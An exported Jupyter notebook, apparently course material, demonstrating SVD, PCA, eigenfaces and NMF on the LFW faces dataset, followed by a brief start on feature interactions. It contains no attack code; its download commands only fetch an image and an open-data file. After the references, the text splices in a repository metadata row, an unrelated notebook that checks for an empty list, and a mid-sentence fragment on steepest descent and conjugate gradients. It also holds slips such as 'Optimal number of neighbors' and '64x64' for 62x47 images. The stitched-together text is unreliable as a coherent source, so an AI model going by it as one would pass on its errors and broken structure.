ax.quiver([x[0]],
[x[1]],
[x[2]],
[x[3]],
angles='xy', scale_units='xy', scale=1, color=cols[i],
alpha=alpha)
def matrixToPlot(matrix, vectorsCol=['#FF9A13', '#1190FF'], ax = None):
ax = ax or plt.gca()
# Unit circle
x = np.linspace(-1, 1, 10000)
y = np.sqrt(1-(x**2))
# Modified unit circle (separate negative and positive parts)
x1 = matrix[0,0]*x + matrix[0,1]*y
y1 = matrix[1,0]*x + matrix[1,1]*y
x1_neg = matrix[0,0]*x - matrix[0,1]*y
y1_neg = matrix[1,0]*x - matrix[1,1]*y
# Vectors
u1 = [matrix[0,0],matrix[1,0]]
v1 = [matrix[0,1],matrix[1,1]]
plotVectors([u1, v1],ax = ax, cols=[vectorsCol[0], vectorsCol[1]])
ax.plot(x1, y1, 'g', alpha=0.5)
ax.plot(x1_neg, y1_neg, 'g', alpha=0.5)
# + id="pWMNzywSATu_" colab={"base_uri": "https://localhost:8080/", "height": 318} outputId="fd173ca9-3a28-45a6-9323-2c57d04faf76"
A = np.array([[3, 7], [5, 2]])
figure, axis = plt.subplots(1,2, subplot_kw= dict(aspect = "equal"), figsize = (10, 6))
matrixToPlot(np.array([[1, 0], [0, 1]]), ax = axis[0])
axis[0].grid()
axis[0].set_title("Unit Circle")
axis[0].set_xlim(-1.5, 1.5)
axis[0].set_ylim(-1.5, 1.5)
matrixToPlot(A, ax = axis[1])
axis[1].set_title("Unit circle transformed by A")
axis[1].grid()
axis[1].set_xlim(-8, 8)
axis[1].set_ylim(-8, 8);
# + id="gnYRT9LIBr5F" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="b6faf550-17b3-4d3c-f21c-b56b48941f47"
U, S, V = np.linalg.svd(A)
U
# + id="Mb9phNWnBwEO" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="a78b90d4-7002-4648-a504-ae2fcb86dbaf"
S
# + id="WD0D7RTYBxAo" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="37478b4a-9edd-420b-d9fc-e140ea2ef50d"
V
# + id="Mqb-hdmHBw9z" colab={"base_uri": "https://localhost:8080/", "height": 282} outputId="3dea9a85-9a88-4578-bf83-43c2771e739b"
figure, axis = plt.subplots(1,4, subplot_kw= dict(aspect = "equal"), figsize = (18, 12))
matrixToPlot(np.array([[1, 0], [0, 1]]), ax = axis[0])
axis[0].grid()
axis[0].set_title("Unit Circle")
axis[0].set_xlim(-1.5, 1.5)
axis[0].set_ylim(-1.5, 1.5)
matrixToPlot(V, ax = axis[1])
axis[1].set_title("First rotation (by V):")
axis[1].grid()
axis[1].set_xlim(-1.5, 1.5)
axis[1].set_ylim(-1.5, 1.5);
matrixToPlot(np.diag(S).dot(V), ax = axis[2])
axis[2].set_title("Scaling (S.dot(V)")
axis[2].grid()
axis[2].set_xlim(-9, 9)
axis[2].set_ylim(-9, 9);
matrixToPlot(U.dot(np.diag(S)).dot(V), ax = axis[3])
axis[3].set_title("Second Rotation (U.dot(S).dot(V))")
axis[3].grid()
axis[3].set_xlim(-8, 8)
axis[3].set_ylim(-8, 8);
# + [markdown] id="MRG2r-FvLGnT"
# ### Singular Values
# The singular values are ordered by descending order. They correspond to a new set of features (that are a linear combination of the original features) with the first feature explaining most of the variance. For instance from the last example we can visualize these new features. The major axis of the elipse will be the first left singular vector ($u_1$) and its norm will be the first singular value ($\sigma_1$).
#
#
# + id="Bt1gLApKLS5L" colab={"base_uri": "https://localhost:8080/", "height": 378} outputId="8fd177d9-3ebe-4582-a5f1-01b8b4a29aa0"
u1 = [S[0]*U[0,0], S[0]*U[0,1]]
v1 = [S[1]*U[1,0], S[1]*U[1,1]]
plt.figure(figsize = (10, 6))
plotVectors([u1, v1], cols=['black', 'black'])
matrixToPlot(A)
plt.text(-5, -4, r"$\sigma_1u_1$", size=18)
plt.text(-4, 1, r"$\sigma_2u_2$", size=18)
plt.xlim(-8, 8)
plt.ylim(-8, 8)
plt.grid()
# + [markdown] id="5tQp9Qlp8A8y"
# They are the major ($\sigma_1u_1$) and minor ($\sigma_2u_2$) axes of the elipse. We can see that the feature corresponding to this major axis is associated with more variance (the range of value on this axis is bigger than the other)
#
#
# Let's now take a look at a simple implementation of SVD with `sklearn`.
# ### Look at this face!
# + id="eURFZ4OsG4Zi"
import numpy as np
from sklearn.datasets import fetch_lfw_people
from matplotlib import pyplot as plt
from sklearn.decomposition import TruncatedSVD
from sklearn.ensemble import RandomForestClassifier
# + id="ClNt2GHqEPPO" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="d6ae6f09-d89c-4e13-d17f-dd9fd20165f6"
faces = fetch_lfw_people(min_faces_per_person= 60)
print(faces.target_names)
print(faces.images.shape)
# + id="MTrHObYNESMs"
X, y = faces.images, faces.target
X_res = X.reshape(X.shape[0], X.shape[1]*X.shape[2])
# + id="HTadycUaEs8J" colab={"base_uri": "https://localhost:8080/", "height": 346} outputId="9aeadd14-8818-4d2c-b442-ef0c2fdb98e1"
#Example Image
plt.matshow(X[0], cmap = "gray");
# + id="dzQPfnVKFIYc" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="93a75f1e-6285-4f40-e5b3-975481de7527"
rf_original = RandomForestClassifier(oob_score=True)
rf_original.fit(X_res,y)
rf_original.oob_score_ # https://en.wikipedia.org/wiki/Out-of-bag_error#:~:text=Out%2Dof%2Dbag%20(OOB,data%20samples%20used%20for%20training.
# + id="MT60Ae5i4LnS"
# Optimal number of components
n_comp = [i for i in range(1,100)]
oob_scores = []
for n in n_comp:
svd = TruncatedSVD(n_components= n)
X_reduced = svd.fit_transform(X_res)
rf_reduced = RandomForestClassifier(oob_score=True)
rf_reduced.fit(X_reduced, y)
oob_scores.append(rf_reduced.oob_score_)
# + id="r8siWvEb6hOB" colab={"base_uri": "https://localhost:8080/", "height": 649} outputId="8fa403e3-5d2e-448a-d764-33a6597adad8"
plt.figure(figsize=(15,10))
plt.title('The optimal number of components', fontsize=20, fontweight='bold')
plt.xlabel('Number of components n', fontsize=15)
plt.ylabel('Out-of-bag score', fontsize=15)
plt.grid()
plt.plot(n_comp, oob_scores)
# + id="1o8sWnJe44jf" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="c3143337-6214-4ddf-ffda-bb740739b915"
best_n_comp = n_comp[oob_scores.index(max(oob_scores))]
print("Optimal number of neighbors: " + str(best_n_comp))
# + id="0gREGLzC6s63" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="7103040e-db08-4d9e-e540-101ae936712c"
svd = TruncatedSVD(n_components= best_n_comp)
X_reduced = svd.fit_transform(X_res)
rf_reduced = RandomForestClassifier(oob_score=True)
rf_reduced.fit(X_reduced, y)
rf_reduced.oob_score_
# + id="oerLYaS3eDmX" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="0b805501-8f92-4b80-8baf-e1848ed09f73"
svd.explained_variance_ratio_.sum()
# + id="rEJeXk0IHzxD" colab={"base_uri": "https://localhost:8080/", "height": 319} outputId="b4fda06e-98d4-469b-f945-682737a4b906"
figure, axis = plt.subplots(1,2, subplot_kw= dict(aspect = "equal"), figsize = (8, 5))
image_reduced = svd.inverse_transform(X_reduced[0].reshape(1,-1))
image_reduced = image_reduced.reshape(faces.images.shape[1], faces.images.shape[2])
axis[0].matshow(X[0], cmap = "gray")
axis[1].matshow(image_reduced, cmap = "gray");
# + [markdown] id="xT6b3PLoaLpJ"
# ## PCA
# Principal component analysis (PCA) is a technique that is useful for the compression and classification of data. The purpose is to reduce the dimensionality of a data set (sample) by finding a new set of variables, smaller than the original set of variables, that nonetheless retains most of the sample's information.
#
# By information we mean the variation present in the sample,
# given by the correlations between the original variables. The new
# variables, called principal components (PCs), are uncorrelated, and are ordered by the fraction of the total information each retains
#
# + id="7aY_GKCvx8vX"
import numpy as np
import matplotlib.pyplot as plt
# + id="w0ATLMLsx85E"
mean = np.array([1, 10])
cov = np.array([[1, 0.8 ],[0.8, 1]])
data = np.random.multivariate_normal(mean, cov, 10000)
X, y = data[:,0], data[:,1]
# + id="aD5W6qJxzW9u" colab={"base_uri": "https://localhost:8080/", "height": 540} outputId="9c638bb4-a111-4a58-ab6e-9beb4db11377"
plt.figure(figsize = (12, 8))
plt.scatter(X,y)
plt.grid()
plt.title('PCA Example', fontsize=20, fontweight='bold')
plt.xlabel('X', fontsize=15)
plt.ylabel('y', fontsize=15)
# + id="tBq6iNYu0oVW" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="2499ad7c-43e9-4815-d40c-f9de9d7ea97f"
from sklearn.decomposition import PCA
pca = PCA(n_components = 2)
pca.fit(data)
# + id="FVy6Tcfc1KFG" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="9a12592a-be26-4b81-96d0-8c6b533648cb"
print(pca.components_)
# + id="yt8Y9Dp_1O9k" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="fe8f9535-4b7e-4652-caa8-1f50f038fb0a"
print(pca.explained_variance_)
# + id="bpBIOU2l1VcH" colab={"base_uri": "https://localhost:8080/", "height": 523} outputId="bce99867-1783-465f-a21c-4fe76223ef3f"
# adapt plotVectors
def draw_vector(v0, v1, ax=None):
ax = ax or plt.gca()
arrowprops=dict(arrowstyle='->',
linewidth=2,
shrinkA=0, shrinkB=0)
ax.annotate('', v1, v0, arrowprops=arrowprops)
# plot data
plt.figure(figsize = (12,8))
plt.scatter(X, y, alpha=0.2)
for length, vector in zip(pca.explained_variance_, pca.components_):
v = vector * 3 * np.sqrt(length)
draw_vector(pca.mean_, pca.mean_ + v)
plt.axis('equal')
plt.title('PCA Example', fontsize=20, fontweight='bold')
plt.xlabel('X', fontsize=15)
plt.ylabel('y', fontsize=15)
plt.grid();
# + [markdown] id="AJWnewOM22xd"
# These vectors represent the principal axes of the data, and the length of the vector is an indication of how "important" that axis is in describing the distribution of the data—more precisely, it is a measure of the variance of the data when projected onto that axis. The projection of each data point onto the principal axes are the "principal components" of the data.
#
# ### Dimensionality Reduction
# + id="WZYME8ij26rQ" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="7c9391e8-4217-4c09-8410-bb1b39e67177"
pca = PCA(n_components=1)
pca.fit(data)
data_pca = pca.transform(data)
print("original shape: ", data.shape)
print("transformed shape:", data_pca.shape)
# + id="Uq7Hskow3Bo2" colab={"base_uri": "https://localhost:8080/", "height": 483} outputId="797f1e12-70f6-482b-b321-7c8968a61e1d"
data_new = pca.inverse_transform(data_pca)
plt.figure(figsize = (12,8))
plt.scatter(X, y, alpha=0.2)
plt.scatter(data_new[:, 0], data_new[:, 1], alpha=0.8)
plt.axis('equal')
plt.grid();
# + [markdown] id="Ouea5Znpx9bZ"
# ### Have you already heard about Eigenfaces?
# + id="dAeby7rTkVHU" colab={"base_uri": "https://localhost:8080/", "height": 136} outputId="de016358-77c5-43bf-eaae-8f5b36cb3ef3"
from sklearn.datasets import fetch_lfw_people
faces = fetch_lfw_people(min_faces_per_person= 60)
print(faces.target_names)
print(faces.images.shape)
# + id="HNsSGfDLkmvY" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="75f2cf03-99a8-4d17-c8ab-3ea52670ef7f"
from sklearn.decomposition import PCA
pca = PCA(n_components = 200)
pca.fit(faces.data)
# + id="pMuXvV8iknaL" colab={"base_uri": "https://localhost:8080/", "height": 252} outputId="d6352564-e35c-443e-f942-d085631b48d1"
fig, axes = plt.subplots(3, 8, figsize=(9, 4),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(pca.components_[i].reshape(62, 47), cmap='binary_r')
# + id="5CxrZGukknjF" colab={"base_uri": "https://localhost:8080/", "height": 283} outputId="8b6bb233-8e06-4bd2-fee4-1533297075f4"
plt.plot(np.cumsum(pca.explained_variance_ratio_))
plt.xlabel('number of components')
plt.ylabel('cumulative explained variance')
plt.grid();
# + [markdown] id="VLN14Ll-nfAi"
# Awesome, let's now try to reconstruct the images using the new reduced dataset. In other words, we transformed the 62x47 pixel images into 1x200 images. Now to visualize how these images look we need to inverse transform the 1x200 images back to 64x64 dimension. Note that we're not reverting back to the original data, we're simply going back to the actual dimension of the original images so we can visualize them.
# + id="DzliZA2FlACH"
components = pca.transform(faces.data)
projected = pca.inverse_transform(components)
# + id="Y3czOmtNlF6c" colab={"base_uri": "https://localhost:8080/", "height": 171} outputId="23476fd7-3152-4154-ab8d-f0d0ea001965"
# Plot the results
fig, ax = plt.subplots(2, 10, figsize=(10, 2.5),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i in range(10):
ax[0, i].imshow(faces.data[i].reshape(62, 47), cmap='binary_r')
ax[1, i].imshow(projected[i].reshape(62, 47), cmap='binary_r')
ax[0, 0].set_ylabel('full-dim\ninput')
ax[1, 0].set_ylabel('200-dim\nreconstruction');
# + [markdown] id="UkGYlL3ylUUH"
# https://jakevdp.github.io/PythonDataScienceHandbook/05.09-principal-component-analysis.html
# + [markdown] id="V5QwB4OBnEy4"
# ### Let's see what happens with a out-of-the-dataset face!
# + id="D-46gZ-oaNXL" colab={"base_uri": "https://localhost:8080/", "height": 224} outputId="f0481fc8-1646-46cf-b3b3-5890c4d7f9f9"
# !wget https://raw.githubusercontent.com/MLJCUnito/ProjectX2020/master/HowToTackleAMLCompetition/img/Lecture7/FaceLec7.jpg
# + id="h5rdX7ckafaK"
from skimage.transform import resize
from skimage.color import rgb2gray
import imageio
source_image = imageio.imread("FaceLec7.jpg")
source_image_res = resize(source_image, (62, 47))[..., :3] #mnist-like size
source_image_res = rgb2gray(source_image_res)
# + [markdown] id="u9T2TBpJfDLS"
# courtesy from https://thispersondoesnotexist.com/
# + id="z0Q2DO2JbLx2" colab={"base_uri": "https://localhost:8080/", "height": 334} outputId="bfa03d55-965c-41bd-e980-ad6ff7ea90f2"
figure, axis = plt.subplots(1,2, subplot_kw= dict(aspect = "equal"), figsize = (8, 5))
axis[0].imshow(source_image)
axis[1].imshow(source_image_res, cmap = "binary_r")
# + id="MvjlqgJRcPpw"
#Reducing dimension into 2 components
component_source_img = pca.transform(source_image_res.reshape(1, -1))
projected_source_img = pca.inverse_transform(component_source_img)
# + id="bSbui8tPlyfA" colab={"base_uri": "https://localhost:8080/", "height": 234} outputId="42f3026a-c4ab-4d97-9127-9e7328a18251"
# Plot the results
fig, ax = plt.subplots(1, 2, figsize=(6, 4),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.4))
ax[0].imshow(source_image_res, cmap='binary_r')
ax[1].imshow(projected_source_img.reshape(62, 47), cmap='binary_r')
ax[0].set_title('full-dim input')
ax[1].set_title('200-dim reconstruction');
# + [markdown] id="y6rXgv7Ln_M-"
# What is going on here?
# + [markdown] id="jDqtu1pzaNe6"
#
# ## NMF
#
# "*Is perception of the whole based on perception of its parts? There is psychological and physiological evidence for parts-based representations in the brain, and certain computational theories of object recognition rely on such representations. But little is known about how brains or computers might learn the parts of objects. Here we demonstrate an algorithm for non-negative matrix factorization that is able to learn parts of faces and semantic features of text. This is in contrast to other methods, such as principal components analysis and vector quantization, that learn holistic, not parts-based, representations*", D.D. Lee & H.S. Seung, Learning the parts of objects by non-negative matrix factorization
#
# Why and how NMF learns such a representation, completely different from the one from PCA? By describing these methods in a matrix factorization framework. Both methods try to re-construct a matrix $V$ by factorizing it in this way: $V \sim WH$.
#
# PCA constrains the columns of $W$ to be orthonormal and the
# rows of $H$ to be orthogonal to each other. This allows a distributed representation in which each face is approximated by a linear combination of all the basis images, or eigenfaces.
#
# NMF does not allow negative entries in the matrix factors $W$ and
# $H$. Only additive combinations are allowed, because the
# non-zero elements of $W$ and $H$ are all positive. In contrast to PCA, no subtractions can occur. For these reasons, the non-negativity
# constraints are compatible with the intuitive notion of combining
# parts to form a whole, which is how NMF learns a parts-based
# representation.
#
#
# https://www.kaggle.com/jinilcs/dimensionality-reduction-pca-nmf-t-sne
#
# + id="MfojjokmBb0x" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="67ab01d1-e1df-4b2f-da27-ef33aedb5b74"
from sklearn.decomposition import NMF
nmf = NMF(n_components = 100, random_state = 0)
nmf.fit(faces.data)
# + id="GhVqSdCpCFEf" colab={"base_uri": "https://localhost:8080/", "height": 252} outputId="be4a22a0-8630-4aea-aa95-9e78cb444428"
fig, axes = plt.subplots(3, 8, figsize=(9, 4),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(nmf.components_[i].reshape(62, 47), cmap='binary_r')
# + id="isbvUQ8-Gnrb"
# Getting a score for NMF, since there's no default explained_variance as in pca
from sklearn import metrics
def get_score(model, data, scorer=metrics.explained_variance_score):
""" Estimate performance of the model on the data """
prediction = model.inverse_transform(model.transform(data))
return scorer(data, prediction)
# + id="JpmnPfhIGxv8" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="514b5b48-a27d-4695-ee96-ee553404de22"
print(get_score(nmf, faces.data))
# + id="fvGA1XbBHZYF" colab={"base_uri": "https://localhost:8080/", "height": 66, "referenced_widgets": ["8051a0e9c6c24958b39f18f806cde884", "eb9644f2bd6b4295a01f0d4d58298bcd", "9baad1efe5904c70ba02c4c04978d9b5", "1af4a135f4674919ac3bafcde2da9fdf", "4976911365d44452bf652162b157793f", "4157c9d55079482b8c5daedc056c1a6b", "e169d99e6030404189d66b951ffecf56", "3b649dad59964093bc2629240a8ae675"]} outputId="5c508172-e53a-4f65-bff0-1a193db452cf"
#it takes a while (around 30 mins on colab), be patient... else, you should reduce the number of components
"""from tqdm.notebook import tqdm
n_comp = [i for i in range(1, 100)]
nmf_scores = []
for n in tqdm(n_comp):
nmf = NMF(n_components= n, random_state = 0)
nmf.fit(faces.data)
nmf_scores.append(get_score(nmf, faces.data))"""
# 0.9 is around 100 components : you have been warned !! :)
# + id="BlOXnd_uIPuE" colab={"base_uri": "https://localhost:8080/", "height": 632} outputId="53748e67-fdca-45f4-99e7-51daaa2c03a7"
plt.figure(figsize=(15,10))
plt.title('The optimal number of components', fontsize=20, fontweight='bold')
plt.xlabel('Number of components n', fontsize=15)
plt.ylabel('Score', fontsize=15)
plt.grid()
plt.plot(n_comp, nmf_scores)
"""plt.savefig("nmf_optimal_comp.png")
from google.colab import files
files.download("nmf_optimal_comp.png")"""
# + id="DlVd58NaRq0T" colab={"base_uri": "https://localhost:8080/", "height": 487} outputId="5d70fea8-8410-4bfc-b4a7-a2366778880b"
from sklearn.decomposition import PCA
pca = PCA(n_components = 100)
pca.fit(faces.data)
nmf = NMF(n_components = 100)
nmf.fit(faces.data)
fig, axes = plt.subplots(3, 8, figsize=(9, 4),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(pca.components_[i].reshape(62, 47), cmap='gray')
fig, axes = plt.subplots(3, 8, figsize=(9, 4),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(nmf.components_[i].reshape(62, 47), cmap='gray')
# + id="J3c0bEpEVq4G" colab={"base_uri": "https://localhost:8080/", "height": 385} outputId="74d04e2f-4ec9-43fb-8139-c06ab29036be"
# A little trick
combined_data = np.array([pca.components_[0], nmf.components_[1]])
#Get the min and max of all your data
_min, _max = np.amin(combined_data), np.amax(combined_data)
# Plot the results
fig, ax = plt.subplots(1, 2, figsize=(10, 8),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
ax[0].imshow(pca.components_[0].reshape(62, 47), cmap='coolwarm', vmin = _min, vmax = _max)
ax[1].imshow(nmf.components_[0].reshape(62, 47), cmap='coolwarm', vmin = _min, vmax = _max)
ax[0].set_ylabel('PCA - 100 components')
ax[1].set_ylabel('NMF - 100 components');
# + [markdown] id="R3Tlr0-2G4u1"
# ## Feature Interactions
#
# *When features interact with each other in a prediction model, the prediction cannot be expressed as the sum of the feature effects, because the effect of one feature depends on the value of the other feature. Aristotle's predicate "The whole is greater than the sum of its parts" applies in the presence of interactions.* Christoph Molnar, Interpretable Machine Learning
#
# A first introduction (thanks to Chris Albon)
# https://chrisalbon.com/machine_learning/linear_regression/adding_interaction_terms/
#
# $\hat{y} = \hat{\beta_0} + \hat{\beta_{1}}x_{1}+ \hat{\beta_{2}}x_{2} + \hat{\beta_{3}}x_{1}x_{2} + \epsilon$
#
# Patsy: https://medium.com/@mummertm/using-patsy-for-statistical-modeling-189a9d9f5d27 ;
#
# https://stats.stackexchange.com/questions/105543/how-to-prepare-interactions-of-categorical-variables-in-scikit-learn
#
# + id="JapCvFlwcffF"
# Load libraries
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
import pandas as pd
# + id="tOrkvv7hc5l8" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="6a7d0a30-14b2-4b78-a135-1183de54b882"
# !wget https://www.arpa.piemonte.it/export/sites/default/accesso-ai-dati/opendata/dati/GIARDINI-REALI.zip
# + id="3cQv4VnTdn5x" colab={"base_uri": "https://localhost:8080/", "height": 187} outputId="931ffe45-9f78-4f98-a032-07f1abc8877c"
# unzipping in the same directory, to specify a path add: -d "path"
# !unzip "GIARDINI-REALI.zip"
# + id="M1BugMpZeGb5"
header_list = ["Data", "Ora", "ID_Rete_Monitoraggio", "Codice_Istat_Comune",
"Progr_Punto_Com","Vel_Vento", "Dir_Vento", "Dev_Std_Vel_Trasversale",
"Press_Atmosferica", "Temp_Aria", "Umid_Relativa", "Rad_Solare_Diretta",
"Rad_Solare_Riflessa", "Precipitazione"]
arpa_data = pd.read_csv("MonthElb_012010_001272907.csv", error_bad_lines=False , sep= ";", names = header_list)
# + id="VnqBa0pae3Ge" colab={"base_uri": "https://localhost:8080/", "height": 224} outputId="02d829f1-86e2-463a-bae5-c6be50866e95"
arpa_data.head()
# + [markdown] id="h8PCNVsMchqI"
#
# ### Partial Dependence Plots
# https://scikit-learn.org/stable/modules/partial_dependence.html
#
#
# ### H-Statistics
#
# https://github.com/ralphhaygood/sklearn-gbmi/blob/master/example.ipynb
# + id="govXXwhBG6Zd" colab={"base_uri": "https://localhost:8080/", "height": 102} outputId="6e87006f-42f8-4fc2-cd32-fae350c50720"
# H-statistics
# !pip install sklearn-gbmi
# + [markdown] id="cJkYstQZG7Pj"
# ## Manifold Learning Methods: t-SNE, UMAP
# + id="OWyTnHJQG_Ml"
# + [markdown] id="8oyhHKuE9xmw"
# # References & Additional Material
#
# * https://www.kaggle.com/deepthiar/toydatasets : KNN Data, a nice Kaggle repo
#
# * http://rasbt.github.io/mlxtend/ : MLxtend library
#
# * https://splot.readthedocs.io/en/stable/users/tutorials/weights.html : PySal Docs
#
# * http://readiab.org/ Applied Bioinformatics in Python
#
# * https://en.wikipedia.org/wiki/Matrix_decomposition , Matrix Factorization techniques
#
# * http://web.ipac.caltech.edu/staff/fmasci/home/astro_refs/PrincipalComponentAnalysis.pdf: PCA
#
#
# * https://jakevdp.github.io/PythonDataScienceHandbook/ : Jake VanderPlas, Data Science Handbook
#
# * https://math.stackexchange.com/questions/3869/what-is-the-intuitive-relationship-between-svd-and-pca#:~:text=Singular%20value%20decomposition%20(SVD)%20and,never%20specify%20the%20exact%20relation : relationship between SVD and PCA
#
# * https://github.com/mtsang/interaction_interpretability Something more on interaction and interpretability (that's pretty difficult tho)
#
# * https://www.jmlr.org/papers/volume9/vandermaaten08a/vandermaaten08a.pdf : t-SNE Paper
#
# * https://lvdmaaten.github.io/tsne/ : t-SNE FAQ
#
#
| 40,319 |
/assign9_prog4.py-checkpoint.ipynb
|
a7c620f52dc879aebe743785f669863134f08d72
|
[] |
no_license
|
maheswarareddy024/assignment9-py
|
https://github.com/maheswarareddy024/assignment9-py
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 686 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
a=[]
if not a:
print ("List is empty")
else:
print("List is not empty")
The system we want to solve has the form
# $$Ax = b \tag{1}$$
# which is eqivalent to finding the stationary point of the quadratic function
# $$f(x) = \frac{1}{2}x^T A x - b^T x + c \tag{2}$$
#
# And the notations we are going to use is as follows
# - $A$ is a known, square, symmetric, positive-definite matrix.
# - $b$ is a known vector.
# - $x$ is the unknown vector.
# - $x_i$ is the estimated $x$ in the $i^{th}$ iteration and $x_0$ is the initial point.
# - $e_i = x-x_i$ is the error between the true $x$ and the estimated $x_i$. It indicates how far we are from the solution.
# - $\alpha_i d_i = (x_i - x_{i-1})$, where $d_i$ is the direction from $x_{i-1}$ to $x_i$.
# - $\alpha_i$ is the weight of the direction.
# - $r_i = b - Ax_{i} = Ax-Ax_i = Ae_i$ is the residual after the $i^{th}$ iteration. It indicates how far we are from the correct value of $b$.
#
# ----------------
#
# # Steepest Descent
#
# Think of a bowl that is given by a quadratic function
#
# $$f(x) = \frac{1}{2}x^T A x - b^T x + c$$
#
# Our goal is to find the lowest point of this bowl.
#
# When first-order derivative of this function is zero, we obtain the solution.
#
# $$f'(x) = Ax - b = 0 \tag{3}$$
#
# However, in the case that the matrix $A$ is large, it's tough to solve this matrix inverse problem directly. Steepest descent is a method that finds the solution step by step. It can start at arbitary point. Then update the position with specific direction and step size.
#
# $$x_{k+1} = x_k - \alpha_k d_k \tag{4}$$
#
# where $\alpha_k$ is the step size and $d_k$ is the direction. The determination of step direction and size follows the rules below.
#
# ## Direction
# For approaching to the lowest point of the bowl iteratively, steepest descent chooses the direction which decreases most quickly at each point. The direction is denoted by
# $$d_k = -f'(x_k) = b - Ax_k = r_k \tag{5}$$
# which is the residual we mentioned in the beginning.
#
# ## Step size
#
# The method we use to determine the step size is called *line search*. It will chooses $\alpha$ to minimize $f$ along a line. <span style="background-color:#e0f0ff">Line search requires that the gradient at the next point should be orthogonal to current search direction.</span>
#
# There is an intuitive reason why we should expect these vectors to be orthogonal at the minimum. The slope of the parabola at any point along the search line is equal to the magnitude of the projection of the gradient onto the line. These projections represent the rate of the increase of $f$ as one traverses the line. $f$ is minimized where the projection is zero - where the gradient is orthogonal to the search line.
#
# We can obtain the best solution of $\alpha_k$ by setting the derivative of $f(x_{k+1})$ to zero.
#
# $$\frac{d}{d\alpha_k}f(x_{k+1}) = f'(x_{k+1})^T\frac{d x_{k+1}}{d \alpha_k} = r_{k+1}^Tr_{k}=0 \tag{6}$$
#
# To determine $\alpha$, we use the expression of $r_{k}$ to denote the vector $r_{k+1}$
#
# $$\begin{align*}
# r_{k+1}r_k &= (b-Ax_{k+1})^T r_k\\
# &= (b-A(x_k+\alpha_k r_k))^T r_k\\
# &= (b-Ax_k)^T r_k - \alpha_k (Ar_k)^T r_k = 0\\
# \Rightarrow \alpha_k (Ar_k)^T r_k &= (b-Ax_k)^T r_k\\
# \alpha_k r_k^T(Ar_k) &= r_k^T r_k\\
# \bbox[#e0f0ff]{\alpha} &= \bbox[#e0f0ff]{\frac{r_k^T r_k}{r_k^T A r_k}} \tag{7}
# \end{align*}$$
#
#
#
# -----------
#
# # Gonjugate_Gradients
#
# No matter what method do we use, the iterative update of $x$ can be denoted by
#
# $$x_{i+1} = x_i + \alpha_i d_i \tag{8}$$
#
# where $d_i$ is the direction we move and $\alpha_i$ is the distance.
#
# ## n step orthogonal direction method
#
# Let's pick a set of orthogonal search directions as well as take exactly one step that will be just the right length to line up evenly with $x$. Then after $n$ steps, we'll reach the point $x$.
#
# In this idea, it is trivial on picking the search directions because we just need them to be orthogonal to each other. The question is how to determine the step size. Projection may help us with it.
#
# $$a_i = \frac{d_i^T (x-x_0)}{d_i^T d_i} = -\frac{d_i^T e_0}{d_i^T d_i} \tag{9}$$
#
# If we know the projection of the error $e_0$ onto each orthogonal equation, we can go to the target $x$ following these routes. However, this method is too silly, because if we know $e_0$, we can receive $x$ directly.
#
#
#
# ## A-orthogonal
#
# The solution is to make the search directions A-orthogonal instead of orthogonal. Two vectors $d_i$ and $d_j$ are A-orthogonal, or conjugate, if
#
# $$d_i^TAd_j = 0 \tag{10}$$
#
# A-orthogonal derives from the Krylov method we discussed in the previous course.
#
# First of all , we can conclude the Krylov method with the table below.
#
#
# | Descrpition | 1 | 2 | 3 | k-1 | k | k+1 |
# |-------------|---|---|---|-----|---|-----|
# |<img width=200/>|<img width=50/>|<img width=50/>|<img width=50/>|<img width=50/>|<img width=50/>|<img width=50/>|
# |Subspace |$\mathcal{K}_1$|$\mathcal{K}_2$|$\mathcal{K}_3$|$\mathcal{K}_{k-1}$|$\mathcal{K}_k$|$\mathcal{K}_{k+1}$|
# |Add the new vector $A^{j}b$ to expand subspace from $\mathcal{K}_{j}$ to $\mathcal{K}_{j+1}$| $b$ | $Ab$ | $A^2b$ | $A^{k-2}b$ | $A^{k-1}b$ | $A^{k}b$ |
# |Orthonormal version of the additional vector| $q_1$ | $q_2$ | $q_3$ | $q_{k-1}$ | $q_{k}$ | $q_{k+1}$ |
# |Vector $x_j$ is in the subspace $\mathcal{K}_j$| $x_1$| $x_2$| $x_3$| $x_{k-1}$| $x_{k}$| $x_{k+1}$|
# |Direction $d_j\propto x_j-x_{j-1}$ is in the subspace $\mathcal{K}_j$| $d_1$| $d_2$| $d_3$| $d_{k-1}$| $d_{k}$| $d_{k+1}$|
# |Residual $r_j=b-Ax_j$ is in the subspace $\mathcal{K}_{j+1}$| $r_0$| $r_1$| $r_2$| $r_{k-2}$| $r_{k-1}$| $r_{k}$|
#
